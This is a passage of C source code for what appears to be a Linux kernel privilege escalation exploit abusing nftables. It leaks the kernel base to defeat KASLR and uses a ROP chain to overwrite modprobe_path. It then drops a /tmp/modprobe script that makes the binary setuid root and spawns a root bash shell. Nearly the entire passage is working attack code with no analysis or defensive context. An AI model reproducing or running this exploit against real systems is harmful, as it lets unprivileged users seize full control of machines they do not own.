    if (len == sizeof(buf) && kernel_base == 0) {
      memcpy( & kernel_base, buf, sizeof(kernel_base));
      kernel_base -= TCP_WRITE_XMIT_OFF;
      break;
    }
  }
}

void rop(uint64_t * rop_buf) {
  int rop_len = 0;

  rop_buf[rop_len++] = kernel_base + 0x083820; // pop rdi; ret; 
  rop_buf[rop_len++] = kernel_base + 0x1654D81; // &modprobe_path
  rop_buf[rop_len++] = kernel_base + 0x08378f; // pop rbp; ret; 
  rop_buf[rop_len++] = 0x2f706d74;
  rop_buf[rop_len++] = kernel_base + 0x56dcb3; // mov dword ptr [rdi], ebp; clc; jmp qword ptr [rsi + 0xf]; 
}

void eop() {
  FILE * modprobe_fp, * script_fp, * trigger_fp;
  char modprobe_path[0x100], exe_path[0x400] = {};
  char * argv[3] = {};

  // loop until modprobe_path overwritten
  while (true) {
    modprobe_fp = fopen("/proc/sys/kernel/modprobe", "r");
    if (modprobe_fp == NULL) {
      exit(EXIT_FAILURE);
    }
    if (fgets(modprobe_path, sizeof(modprobe_path), modprobe_fp) == NULL) {
      exit(EXIT_FAILURE);
    }
    fclose(modprobe_fp);

    if (strcmp(modprobe_path, "/sbin/modprobe\n")) {
      break;
    }
    sleep(1);
  }

  // create script to be executed by root
  if (readlink("/proc/self/exe", exe_path, sizeof(exe_path)) < 0) {
    exit(EXIT_FAILURE);
  }
  script_fp = fopen("/tmp/modprobe", "w+");
  if (script_fp == NULL) {
    exit(EXIT_FAILURE);
  }
  fprintf(script_fp, "#!/bin/sh\n");
  fprintf(script_fp, "chown root:root \"%s\"\n", exe_path);
  fprintf(script_fp, "chmod u+s \"%s\"\n", exe_path);
  fclose(script_fp);
  chmod("/tmp/modprobe", 0755);

  // create trigger script
  trigger_fp = fopen("/tmp/DxNtuO", "w+");
  if (trigger_fp == NULL) {
    exit(EXIT_FAILURE);
  }
  fwrite("\xff\xff\xff\xff", sizeof(char), 4, trigger_fp);
  fclose(trigger_fp);
  chmod("/tmp/DxNtuO", 0755);

  // elevate privileges
  argv[0] = "/tmp/DxNtuO";
  execv(argv[0], argv);

  printf("[*] Cleaning up...\n");
  unlink("/tmp/modprobe");
  unlink("/tmp/DxNtuO");

  printf("[*] Getting root shell...\n");
  argv[0] = exe_path;
  argv[1] = "DxNtuO";
  execv(argv[0], argv);

  exit(EXIT_SUCCESS);
}

void shell() {
  setresuid(0, 0, 0);
  system("bash");
  exit(EXIT_SUCCESS);
}

int main(int argc, char * argv[]) {
  int s;
  char buf[0x100];
  pthread_t thread_id;
  struct nftnl_rule * rule;
  struct nftnl_expr * expr;
  uint32_t pktlen = 0x134;
  nftpwn_base_chain_param base_param = {
    .hooknum = NF_INET_LOCAL_OUT,
    .prio = 0
  };

  if (argc > 1) {
    shell();
  }
  if (fork()) {
    eop();
  }

  printf("[*] Initializing...\n");
  if (setup_sandbox() < 0) {
    exit(EXIT_FAILURE);
  }

  memset(buf, 0x41, sizeof(buf));
  system("ip link set dev lo up");
  pthread_create( & thread_id, NULL, tcp_server, tcp_handler);
  sleep(1);

  // Get kernel base
  printf("[*] Bypassing KASLR...\n");
  nftpwn_add_table(NFPROTO_IPV4, "table1", NULL, 0);
  nftpwn_add_chain(NFPROTO_IPV4, "table1", "chain1", & base_param);

  rule = nftnl_rule_alloc();
  nftpwn_rule_add_payload_set(rule, NFT_PAYLOAD_NETWORK_HEADER, 52, 0xf0, 0x3fffffd6);
  nftpwn_add_rule(NFPROTO_IPV4, "table1", "chain1", rule);

  tcp_send(buf, sizeof(buf));
  sleep(3);

  if (kernel_base == 0 || (kernel_base & 0xfffff)) {
    printf("[-] Failed to get kernel base\n");
    exit(EXIT_FAILURE);
  }
  nftpwn_del_chain(NFPROTO_IPV4, "table1", "chain1");
  printf("    Kernel base: %p\n", kernel_base);

  // Code execution
  printf("[*] Overwriting modprobe...\n");
  nftpwn_add_table(NFPROTO_IPV4, "table1", NULL, 0);
  nftpwn_add_chain(NFPROTO_IPV4, "table1", "chain1", & base_param);
  nftpwn_add_chain(NFPROTO_IPV4, "table1", "chain2", NULL);

  rule = nftnl_rule_alloc();
  nftpwn_rule_add_meta_get(rule, NFT_META_LEN, NFT_REG32_00);
  nftpwn_rule_add_cmp(rule, NFT_CMP_EQ, NFT_REG32_00, & pktlen, sizeof(pktlen));
  nftpwn_rule_add_immediate_verdict(rule, NFT_JUMP, "chain2");
  nftpwn_add_rule(NFPROTO_IPV4, "table1", "chain1", rule);

  rule = nftnl_rule_alloc();
  nftpwn_rule_add_payload(rule, NFT_PAYLOAD_NETWORK_HEADER, 52, 0xf0, 0x3fffffd6);
  nftpwn_add_rule(NFPROTO_IPV4, "table1", "chain2", rule);

  rop((uint64_t * ) buf);
  tcp_send(buf, sizeof(buf));

  // Should never reach here

  return 0;
}

?

Get in touch